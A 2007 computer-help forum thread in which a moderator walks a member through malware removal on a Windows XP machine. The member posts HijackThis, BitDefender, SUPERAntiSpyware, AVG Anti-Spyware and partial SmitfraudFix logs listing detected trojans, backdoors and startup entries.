Alright, now follow this guide:
http://forum.CCleaner.com/index.php?showtopic=6329

In your next reply post the four logs you get from doing those steps (AVG Anti-Spyware, SUPERAntiSpyware, BitDefender and a new HijackThis log).

--------------------
Having problems with spyware and viruses? If so then please follow the Spyware Removal Guide
Want to know how to protect your clean computer from viruses and spyware? Then please follow the Malware Prevention Guide
Looking for good free security software? (or other great free stuff) Then please take a look at the Recommended Security Applications Guide

Post #5, Feb 6 2007, 11:40 AM (Member)
Thanks Rridgely, I followed the details; below are the reports.
These spyware tools removed many infections.

1) HijackThis log

Logfile of HijackThis v1.99.1
Scan saved at 4:53:54 PM, on 2/6/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\eScan\TRAYSSER.EXE
C:\PROGRA~1\eScan\avpm.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWAgent.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Spyware Nuker\swnxt.exe
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\system32\srrvc.exe
C:\PROGRA~1\eScan\TRAYICOS.EXE
C:\PROGRA~1\eScan\AVPMWrap.EXE
C:\PROGRA~1\eScan\MAILDISP.EXE
C:\WINDOWS\system32\mfcee.exe
C:\Documents and Settings\Sys\4.exe
C:\PROGRA~1\eScan\MAILSCAN.EXE
C:\PROGRA~1\ESCAN\SPOOLER.EXE
C:\PROGRA~1\eScan\kavss.exe
C:\WINDOWS\System32\ctfmon.exe
D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\eScan\AvpM.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
D:\Program Files\Skype\Phone\Skype.exe
D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\Program Files\SAMSUNG\Samsung Multimedia Keyboard\gpkbd.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.in/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: DAPHelper Class - {0000CC75-ACF3-4cac-A0A9-DD3868E06852} - D:\Program Files\DAP\DAPBHO.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {481E7983-1F2B-4250-951A-44E0902DF978} - (no file)
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: (no name) - {68D5CF1D-EC5C-4bdd-A9EF-F0E517565D50} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SWN2] C:\Program Files\Spyware Nuker\swnxt.exe /h
O4 - HKLM\..\Run: [DSLSTATEXE] C:\Program Files\GlobespanVirata\Adsl\dslstat.exe icon
O4 - HKLM\..\Run: [DSLAGENTEXE] C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKLM\..\Run: [MailScan Dispatcher] "C:\Program Files\eScan\LAUNCH.EXE"
O4 - HKLM\..\Run: [eScan Updater] C:\PROGRA~1\eScan\TRAYICOS.EXE /App
O4 - HKLM\..\Run: [eScan Monitor] C:\PROGRA~1\eScan\AVPMWrap.EXE
O4 - HKLM\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKLM\..\Run: [melg34] C:\Documents and Settings\Sys\4.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKCU\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKCU\..\Run: [melg34] C:\Documents and Settings\Sys\4.exe
O4 - HKCU\..\Run: [SUPERAntiSpyware] D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://download.bitdefender.com/resources/scan8/oscan8.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O17 - HKLM\System\CCS\Services\Tcpip\..\{7A1DA16E-B943-4E3A-A5A8-FF298FFD2041}: NameServer = 202.54.29.5 202.54.6.60
O20 - Winlogon Notify: !SASWinLogon - D:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: eScan Server-Updater (eScan-trayicos) - MicroWorld Technologies Inc. - C:\PROGRA~1\eScan\TRAYSSER.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: eScan Monitor Service (KAVMonitorService) - Kaspersky Labs. - C:\PROGRA~1\eScan\avpm.exe
O23 - Service: MWAgent - MicroWorld Technologies Inc. - C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe

2) BitDefender report

BitDefender Online Scanner - Real Time Virus Report
Generated at: Tue, Feb 06, 2007 - 14:51:55

Scan info
Scanned files:   621382
Infected files:  378

Virus detected                                  Count
DeepScan:Generic.Malware.SYBddldg.26A600B3          5
Trojan.Agent.ACL                                    1
Backdoor.Rbot.FGD                                   4
DeepScan:Generic.Malware.SYddldg.855620B1           2
Backdoor.Sdbot.W                                    1
MemScan:Trojan.Vundo.W                              3
BehavesLike:Win32.FileInfector                     12
Trojan.Downloader.Conhook.D                         4
Trojan.Juan.E                                       2
Trojan.Virtumod.EB                                  9
DeepScan:Generic.Malware.SYddldg.21FE268A         287
DeepScan:Generic.Malware.SYddldg.23F1AE3A          42
Backdoor.Rbot.BDQ                                   5
Generic.Botget.930D50D4                             1

This summary of the scan process will be used by the BitDefender Antivirus Lab to create aggregate statistics about virus activity around the world.
3) SUPERAntiSpyware scan report

SUPERAntiSpyware Scan Log
Generated 02/06/2007 at 03:36 PM

Application Version : 3.5.1016
Core Rules Database Version : 3178
Trace Rules Database Version: 1188

Scan type : Complete Scan
Total Scan Time : 00:17:47

Memory items scanned : 478
Memory threats detected : 1
Registry items scanned : 6149
Registry threats detected : 8
File items scanned : 25650
File threats detected : 96

Trojan.SVCCHost
C:\WINDOWS\SYSTEM32\SVCCHOST.EXE
C:\WINDOWS\SYSTEM32\SVCCHOST.EXE
[msvcc25] C:\WINDOWS\SYSTEM32\SVCCHOST.EXE
[msvcc25] C:\WINDOWS\SYSTEM32\SVCCHOST.EXE

Adware.Tracking Cookie
C:\Documents and Settings\Sys\Cookies\sys@1072664508[1].txt
C:\Documents and Settings\Sys\Cookies\sys@indexstats[2].txt
C:\Documents and Settings\Sys\Cookies\sys@mediaplex[1].txt
C:\Documents and Settings\Sys\Cookies\sys@www.freesexyindians[3].txt
C:\Documents and Settings\Sys\Cookies\sys@1069251633[1].txt
C:\Documents and Settings\Sys\Cookies\sys@www.winantispyware[1].txt
C:\Documents and Settings\Sys\Cookies\sys@doubleclick[2].txt
C:\Documents and Settings\Sys\Cookies\sys@adrevolver[1].txt
C:\Documents and Settings\Sys\Cookies\sys@tribalfusion[1].txt
C:\Documents and Settings\Sys\Cookies\sys@1066815633[1].txt
C:\Documents and Settings\Sys\Cookies\sys@fastclick[2].txt
C:\Documents and Settings\Sys\Cookies\sys@cbs.112.2o7[1].txt
C:\Documents and Settings\Sys\Cookies\sys@adrevolver[2].txt
C:\Documents and Settings\Sys\Cookies\sys@stats1.reliablestats[2].txt
C:\Documents and Settings\Sys\Cookies\sys@winantivirus[2].txt
C:\Documents and Settings\Sys\Cookies\sys@casalemedia[2].txt
C:\Documents and Settings\Sys\Cookies\sys@bs.serving-sys[2].txt
C:\Documents and Settings\Sys\Cookies\sys@atdmt[2].txt
C:\Documents and Settings\Sys\Cookies\sys@www.amaena[2].txt
C:\Documents and Settings\Sys\Cookies\sys@serving-sys[1].txt
C:\Documents and Settings\Sys\Cookies\sys@adbrite[2].txt
C:\Documents and Settings\Sys\Cookies\sys@1069738494[1].txt
C:\Documents and Settings\Sys\Cookies\sys@www.winantivirus[1].txt
C:\Documents and Settings\Sys\Cookies\sys@adserver[1].txt
C:\Documents and Settings\Sys\Cookies\sys@ad.parachat[2].txt
C:\Documents and Settings\Sys\Cookies\sys@ads.realtechnetwork[2].txt
C:\Documents and Settings\Sys\Cookies\sys@overture[1].txt
C:\Documents and Settings\Sys\Cookies\sys@winantispyware[2].txt
C:\Documents and Settings\Sys\Cookies\sys@pro-market[1].txt
C:\Documents and Settings\Sys\Cookies\sys@ad.yieldmanager[1].txt
C:\Documents and Settings\Sys\Cookies\sys@www.freesexyindians[1].txt

Adware.Vundo Variant
HKCR\CLSID\{68D5CF1D-EC5C-4BDD-A9EF-F0E517565D50}
HKCR\CLSID\{68D5CF1D-EC5C-4BDD-A9EF-F0E517565D50}\InprocServer32
HKCR\CLSID\{68D5CF1D-EC5C-4BDD-A9EF-F0E517565D50}\InprocServer32#ThreadingModel

Unclassified.Unknown Origin
HKCR\CLSID\{481E7983-1F2B-4250-951A-44E0902DF978}
HKCR\CLSID\{481E7983-1F2B-4250-951A-44E0902DF978}\InprocServer32
HKCR\CLSID\{481E7983-1F2B-4250-951A-44E0902DF978}\InprocServer32#ThreadingModel

Malware.SpywareNuker
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP201\A0048059.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP202\A0048076.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP203\A0048077.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP203\A0048086.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP204\A0048103.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP204\A0048133.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP204\A0048146.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP204\A0048174.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048191.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048213.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048223.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048236.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048256.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048265.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048275.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP206\A0048290.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP206\A0048299.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP206\A0048318.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP206\A0048349.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP206\A0048363.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP207\A0048373.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP207\A0048382.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP207\A0048410.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP207\A0048429.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP207\A0048460.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049458.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049470.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049484.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049503.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049512.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049560.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049598.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049633.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049650.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049663.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049682.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP209\A0049705.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP209\A0049751.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP209\A0049767.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP209\A0049806.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP209\A0049821.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP210\A0050822.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP210\A0051821.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP210\A0051835.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0051851.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0051865.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0051892.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0051931.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052055.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052077.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052118.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052154.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053389.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053403.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053418.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053465.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053497.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053530.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053552.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053568.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053584.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053601.SYS
C:\WINDOWS\SYSTEM32\DRIVERS\PSHOOK11.SYS

Trojan.Downloader-WBRock
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053645.EXE

4) AVG Anti-Spyware scan report

---------------------------------------------------------
AVG Anti-Spyware - Scan Report
---------------------------------------------------------

+ Created at: 4:47:46 PM 2/6/2007

+ Scan result:

C:\WINDOWS\system32\ajj.exe -> Adware.Aureate : Ignored.
HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{c95fe080-8f5d-11d2-a20b-00aa003c157a} -> Adware.Generic : Ignored.
[352] C:\WINDOWS\System32\mysvcc.exe -> Backdoor.Rbot.aeu : Cleaned with backup (quarantined).
C:\Documents and Settings\Sys\Cookies\sys@trafic[1].txt -> TrackingCookie.Trafic : Cleaned.

::Report end
Feb 7 2007, 12:04 AM
Post
#6
I hate computers · Group: Moderators · Posts: 8,645 · Joined: 12-April 05 · Member No.: 1,352
Please download SmitfraudFix (by S!Ri)
Extract the content (a folder named SmitfraudFix) to your Desktop.

Open the SmitfraudFix folder and double-click smitfraudfix.cmd
Select option #1 - Search by typing 1 and press "Enter"; a text file will appear, which lists infected files (if present).
Please copy/paste the content of that report into your next reply.

-------

Download this file - combofix.exe and save it to your desktop.
Double click combofix.exe & follow the prompts.
When it's finished, it will produce a log of what it found. Please post the contents of that log in your next reply.

Note: Do not mouseclick combofix's window whilst it's running as it may cause it to stall

In your next post I want a combofix log, smitfraud log, and a new hijackthis log.

--------------------
Having problems with spyware and viruses? If so then please follow the Spyware Removal Guide
Want to know how to protect your clean computer from viruses and spyware? Then please follow the Malware Prevention Guide
Looking for good free security software? (or other great free stuff) Then please take a look at the Recommended Security Applications Guide
Feb 8 2007, 10:40 AM
Post
#7
Member · Group: Members · Posts: 16 · Joined: 4-February 07 · Member No.: 10,964
Thanks rridgely, after extracting Smitfraudfix, I double clicked smitfraudfix.cmd. But I got an error message "Reboot.exe file is missing!".
Later when I checked, I couldn't extract the "reboot.exe" file. I could see reboot.exe in the winzip window, but this particular file is not getting extracted though I tried different methods. Any suggestions where I am wrong!
Feb 8 2007, 01:11 PM
Post
#8
Member · Group: Members · Posts: 16 · Joined: 4-February 07 · Member No.: 10,964
Later I could find the virus software that was stopping the extraction of "reboot.exe". I disabled that software and followed your instructions; below are the reports. Please study and advise the next step, thanks.
1) SMITFRAUDFIX REPORT:

SmitFraudFix v2.141

Scan done at 16:18:52.46, Thu 02/08/2007
Run from C:\Documents and Settings\Sys\Desktop\SmitfraudFix
OS: Microsoft Windows XP [Version 5.1.2600] - Windows_NT
The filesystem type is NTFS
Fix run in normal mode

»»»»»»»»»»»»»»»»»»»»»»»» hosts

»»»»»»»»»»»»»»»»»»»»»»»» C:\

»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS

